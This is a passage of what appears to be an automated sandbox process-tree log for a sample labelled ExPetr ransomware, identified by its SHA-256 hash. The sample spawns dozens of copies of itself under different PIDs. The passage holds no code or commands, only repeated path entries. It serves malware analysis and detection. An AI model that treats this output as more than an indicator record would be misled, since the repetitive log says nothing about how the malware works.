                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                      4⤵
                                                                                        PID:5212
                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                        4⤵
                                                                                          PID:5812
                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                          4⤵
                                                                                            PID:6260
                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                            4⤵
                                                                                              PID:4452
                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                              4⤵
                                                                                                PID:5232
                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                4⤵
                                                                                                  PID:5832
                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                  4⤵
                                                                                                    PID:5436
                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                    4⤵
                                                                                                      PID:5448
                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                      4⤵
                                                                                                        PID:5488
                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                        4⤵
                                                                                                          PID:6312
                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                          4⤵
                                                                                                            PID:6320
                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                            4⤵
                                                                                                              PID:6340
                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                              4⤵
                                                                                                                PID:6384
                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                4⤵
                                                                                                                  PID:6428
                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                  4⤵
                                                                                                                    PID:6444
                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                    4⤵
                                                                                                                      PID:6872
                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                      4⤵
                                                                                                                        PID:6416
                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                        4⤵
                                                                                                                          PID:6584
                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                          4⤵
                                                                                                                            PID:6596
                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                            4⤵
                                                                                                                              PID:6604
                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                              4⤵
                                                                                                                                PID:6612
                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                4⤵
                                                                                                                                  PID:6624
                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                  4⤵
                                                                                                                                    PID:6640
                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                    4⤵
                                                                                                                                      PID:6648
                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:6652
                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                        4⤵
                                                                                                                                          PID:6736
                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:6744
                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                            4⤵
                                                                                                                                              PID:6516
                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                              4⤵
                                                                                                                                                PID:6456
                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:6460
                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6468
                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:6480
                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                      4⤵
                                                                                                                                                        PID:6496
                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5328
                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5968
                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5544
                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:6540
                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:316
                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:6856
                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6840
                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:6832
                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:6824
                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6816
                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6808
                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6804
                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6572
                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6564
                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:6556
                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5308
                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3480
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3548
                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6220
                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5920
                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:6536
                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:6140
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3580
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5908
                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5568
                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:6676
                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:3308
                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:6204
                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:6424
